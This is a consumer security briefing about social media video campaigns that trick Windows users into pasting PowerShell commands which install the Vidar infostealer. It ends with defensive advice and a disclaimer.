The next malware campaign aimed at you might arrive as a helpful-looking TikTok or Instagram Reels video. Researchers at ReversingLabs have uncovered two active campaigns that use short, professional-looking social media clips promising free Spotify Premium, free Windows activation, or free Microsoft Office, then walk viewers step by step into infecting their own Windows PCs with an infostealer.
It is the latest sign that criminals have learned to work social media algorithms as skillfully as marketers do, moving away from email phishing and toward tricking people into running malware themselves. National cybersecurity agencies and other researchers have reported similar activity, pointing to a growing trend.
How the scam works
One campaign is especially polished. Accounts with names like windows.tips or windows.insights adopt Windows-style branding and post tutorial videos that look like genuine tech-support content, tagged with Windows and Office keywords so they surface alongside real troubleshooting clips. The videos promise to unlock Spotify Premium, Office, or Windows at no cost, then guide viewers to open PowerShell, a legitimate Windows administration tool, and paste in commands. Those commands quietly download and run malware, the same self-inflicted pattern seen in so-called ClickFix scams.
The payload was identified as Vidar, an infostealer that targets saved browser passwords, autofill data, cookies, cryptocurrency wallets, two-factor authentication data, and even Tor browser data, then sends everything back to attacker-controlled servers. ReversingLabs notes that scripts in similar TikTok-based attacks often add exclusions to Windows Defender first, making it harder for security software to catch what follows.
What you should do
Only download software from official vendor websites, and be skeptical of any free, cracked, or unofficial version of paid software. Most importantly, never paste commands into PowerShell or a terminal just because a video or web page told you to, because that single step is what turns a curious viewer into a victim. Watch for pages that use countdowns or fake user counters to rush you, and verify a downloaded file's publisher and digital signature before running it. Mac users face the same playbook through fake installers that walk victims past Apple's Gatekeeper. You can read more in the report documenting the ReversingLabs findings.
This briefing is provided by IntelFusions for informational and defensive purposes only. It is based on sources assessed to be reliable at the time of writing, and analytic judgments carry the confidence levels indicated. Indicators of compromise are defanged; re-arm them only in controlled environments. IntelFusions is not affiliated with the organizations named and makes no warranty as to completeness or accuracy.